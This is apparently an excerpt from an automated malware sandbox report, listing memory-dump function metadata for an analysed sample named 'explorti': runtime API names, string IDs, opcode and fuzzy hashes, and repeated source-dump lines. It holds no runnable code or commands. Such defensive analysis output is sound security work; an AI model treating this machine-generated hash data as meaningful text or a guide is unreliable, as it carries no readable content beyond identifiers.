                      • Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_530000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: _wcsrchr
                      • String ID: .bat$.cmd$.com$.exe
                      • API String ID: 1752292252-4019086052
                      • Opcode ID: 09eb5883ddc01f6736136ebfe717377f1df2024c6304b03aed2b3e4d6819da4e
                      • Instruction ID: c4da85544a5a95fd506564004086e2b2252701ec117b42ff92d3eb2914070954
                      • Opcode Fuzzy Hash: 09eb5883ddc01f6736136ebfe717377f1df2024c6304b03aed2b3e4d6819da4e
                      • Instruction Fuzzy Hash: 2A01A57760861A2676186419DC0263B1F9CBF87BB8715002BFD54F73C1DE55DC42C6A4
                      APIs
                      Memory Dump Source
                      • Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true
                      • Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_530000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: Mtx_unlock$Cnd_broadcast
                      • String ID:
                      • API String ID: 32384418-0
                      • Opcode ID: 1ff63eea2f5db4f397fd0d55d645a998c59634d3460022d4805a78501a68df19
                      • Instruction ID: 9daa25d47894d4a0f6d064c189ce16dd42a70388f7ecf324e7eeda10e4961ad9
                      • Opcode Fuzzy Hash: 1ff63eea2f5db4f397fd0d55d645a998c59634d3460022d4805a78501a68df19
                      • Instruction Fuzzy Hash: ECA1E1B0A01706AFDB11DF64C949BAABFB8FF55318F048529E815DB241EB35EA04CBD1
                      APIs
                      • ___std_exception_copy.LIBVCRUNTIME ref: 00532806
                      • ___std_exception_destroy.LIBVCRUNTIME ref: 005328A0
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true
                      • Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_530000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: ___std_exception_copy___std_exception_destroy
                      • String ID: P#S$P#S
                      • API String ID: 2970364248-1326814652
                      • Opcode ID: 8ad761b1387520125b814f26eed6738f94efa3bea2803db1c36e35f001a31c1a
                      • Instruction ID: 3cc7ae3fe3c78d65178d7a1272bcfc954dcb46f3b4d876bed3fa71d3be7af3b0
                      • Opcode Fuzzy Hash: 8ad761b1387520125b814f26eed6738f94efa3bea2803db1c36e35f001a31c1a
                      • Instruction Fuzzy Hash: 60718F71E002099BDB04DFA8C885ADDFFB5FF59314F148119E805B7281EB74A944CBA5
                      APIs
                      • ___std_exception_copy.LIBVCRUNTIME ref: 00532B23
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true
                      • Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_530000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: ___std_exception_copy
                      • String ID: P#S$P#S$This function cannot be called on a default constructed task
                      • API String ID: 2659868963-3752874884
                      • Opcode ID: acd23f5d19380b432de10f2869bf89bd5afa3efba4f5372ad01ce1e0eea09651
                      • Instruction ID: 67ccb8b18ae1df0b823d6037b9746bde60b4385315c6633802b76c4ccdee6b5a
                      • Opcode Fuzzy Hash: acd23f5d19380b432de10f2869bf89bd5afa3efba4f5372ad01ce1e0eea09651
                      • Instruction Fuzzy Hash: CBF0C27091020CABC710EFA8A84599ABFEDEF55304F5041AEF804A7201EB70AA48CB94
                      APIs
                      • ___std_exception_copy.LIBVCRUNTIME ref: 0053247E
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true
                      • Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_530000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: ___std_exception_copy
                      • String ID: 'kTd+Y$P#S$P#S
                      • API String ID: 2659868963-2303812495
                      • Opcode ID: 4f181eeb880b08e128dbb04be955a62e34c44fd06557f27a1f515df092becf49
                      • Instruction ID: b4ab58d2b7e72ae784957f2498ce1dc4125a96c43fc10ebb87ff8bf59c010e07
                      • Opcode Fuzzy Hash: 4f181eeb880b08e128dbb04be955a62e34c44fd06557f27a1f515df092becf49
                      • Instruction Fuzzy Hash: 36F0E5B2D1030D6BCB14FBE8D805889BBECEE55300F008A25FA44E7940F770FA488BA1
                      APIs
                      Memory Dump Source
                      • Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true
                      • Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_530000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: _strrchr
                      • String ID:
                      • API String ID: 3213747228-0
                      • Opcode ID: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
                      • Instruction ID: dcb76079a840842d0a1de2b1b375e41e8871643b63de17a5aa1476096a50e42b
                      • Opcode Fuzzy Hash: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
                      • Instruction Fuzzy Hash: 27B139329002869FEB11CF68C895BBEBFE5FF95340F1485AAD899EB341D6349D41CB60
                      APIs
                      Memory Dump Source
                      • Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true
                      • Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_530000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: Xtime_diff_to_millis2_xtime_get
                      • String ID:
                      • API String ID: 531285432-0
                      • Opcode ID: 669ddd414ef58d009565e43842354332a32ee7a83e203020d5aff40435385cb6
                      • Instruction ID: 2f93d06465487767d2b42a44aaeecbaa082de676dc667c81c6b9f148d9d65530
                      • Opcode Fuzzy Hash: 669ddd414ef58d009565e43842354332a32ee7a83e203020d5aff40435385cb6
                      • Instruction Fuzzy Hash: AF212C75A0110AAFDF51EFA4DC459EEBFB8FF88718F000065F901A7261DB74AE059BA1
                      APIs
                      • __Mtx_init_in_situ.LIBCPMT ref: 0054726C
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true
                      • Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_530000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: Mtx_init_in_situ
                      • String ID: @.S$`zT
                      • API String ID: 3366076730-1159957634
                      • Opcode ID: 1c3ac9c6346176f0b58fcef7549cd9beabc20e3d09555e396fbc1cdb08f76dac
                      • Instruction ID: 8e3f6e19aa98b1417866fa5fcb306900ad94c367d21882ea82f25d2daadf4585
                      • Opcode Fuzzy Hash: 1c3ac9c6346176f0b58fcef7549cd9beabc20e3d09555e396fbc1cdb08f76dac
                      • Instruction Fuzzy Hash: 6FA136B4A01619CFDB21CFA8C88479EBBF0BF48714F18815AE819AB351E7759D01CF80
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true
                      • Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_530000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: ___free_lconv_mon
                      • String ID: 8"Y$`'Y
                      • API String ID: 3903695350-3597833648
                      • Opcode ID: e90612cbb4a58b59a2b9e1fd189904bbce5761e26dfd850b2be0998a06154d3e
                      • Instruction ID: 20a79415a537e1dbc7da07e117e33f36c3a93f393a5d06f8bf13d9ed2b1f217f
                      • Opcode Fuzzy Hash: e90612cbb4a58b59a2b9e1fd189904bbce5761e26dfd850b2be0998a06154d3e
                      • Instruction Fuzzy Hash: EB311D35A003069FEB21AB79ED49B5A7BE9BF80310F144839F456E7251DF71AC808F21
                      APIs
                      • __Mtx_init_in_situ.LIBCPMT ref: 00533962
                      • __Mtx_init_in_situ.LIBCPMT ref: 005339A1
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true
                      • Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_530000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: Mtx_init_in_situ
                      • String ID: pBS
                      • API String ID: 3366076730-2610797707
                      • Opcode ID: 284c3959019bd016de6baebef52e3d9ead4927c388e36eb0916f7b02a7104da1
                      • Instruction ID: 0962448e7cd7dba5fd9a522a451023ccc26e2067a86ed9bf0ff6c9d569633f6d
                      • Opcode Fuzzy Hash: 284c3959019bd016de6baebef52e3d9ead4927c388e36eb0916f7b02a7104da1
                      • Instruction Fuzzy Hash: 564133B1601B05CFD720CF19C988B9ABBF0FF84315F148619E86A8B341E7B4EA05CB80
                      APIs
                      • ___std_exception_copy.LIBVCRUNTIME ref: 00532552
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true
                      • Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_530000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: ___std_exception_copy
                      • String ID: P#S$P#S
                      • API String ID: 2659868963-1326814652
                      • Opcode ID: a6ddb80344f003362ed81d0f8967156ec915dddf5e7a3f8688b602d0f6a3a7bd
                      • Instruction ID: fb109e9d824399ff3413d1a513e401fd7c360f1eec462fc6a9c16392c67071c3
                      • Opcode Fuzzy Hash: a6ddb80344f003362ed81d0f8967156ec915dddf5e7a3f8688b602d0f6a3a7bd
                      • Instruction Fuzzy Hash: 0BF08271D1120DABCB14DFA8D84198EBFF4AF95304F1082AEE84567240EA715A58CB95